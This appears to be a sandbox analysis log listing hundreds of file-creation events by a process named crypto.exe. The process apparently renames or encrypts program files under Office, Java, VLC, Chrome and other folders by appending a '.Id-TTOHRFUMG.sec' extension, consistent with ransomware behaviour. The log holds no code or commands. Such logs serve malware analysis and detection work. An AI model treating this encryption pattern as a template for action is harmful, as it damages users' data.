File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01572_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WWINTL.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)redStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199473.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\TexturedBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libvnc_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099158.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSACCESS_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mscss7fr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Details.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libwingdi_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\40.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fil.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Mail\wab.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Johannesburg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00433_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.DEV_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197979.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02740G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02439_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21309_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\ViewHeaderPreview.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\[email protected]	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-highlight.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\blank.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXCEL_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\INVITE11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libcdg_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libhqdn3d_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ta.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\glib-lite.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00269_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01569_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libsftp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\bn.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05869_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02028_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15060_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\wmpnssci.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot_lrg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL096.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\MENU.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedZhengMa.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\picturePuzzle.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\form_edit.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.NZ.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00476_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090089.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME45.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_select-highlight.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00882_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\10.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Vladivostok.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ConnectExpand.ADTS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0291984.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-hot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_hail.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\28.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\header-background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\JdbcOdbc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+11.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\El_Salvador.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_selectionsubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR48F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00438_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00913_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\AUTHOR.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OMSMAIN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\main_background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_windy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Adak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\PublicFunctions.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_splitter\libwall_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\classlist.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01066_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02742G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Library\Analysis\FUNCRES.XLAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGNAVBAR.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00806_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00485_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\XML Files\StarterToolTemplates.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\it.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\NOTEBOOK.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR32F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\WindowsAccessBridge-64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00723_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)greenStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01627_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsVersion1Warning.htm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\QUIKPUBS.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\XPAGE3C.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00513_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\PipeTran.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00306_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_GreenTea.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-hot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\mk.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02024_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\sunec.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Name.accft.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\flyoutBack.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Bahia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18228_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME41.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\precomplete.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02048_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Solstice.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\ALARM.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\wmplayer.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\EMAIL.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\fi.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02068_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10300_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePageScript.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_dummy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.MY.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\index.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Events.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_up.png.Id-TTOHRFUMG.sec	crypto.exe
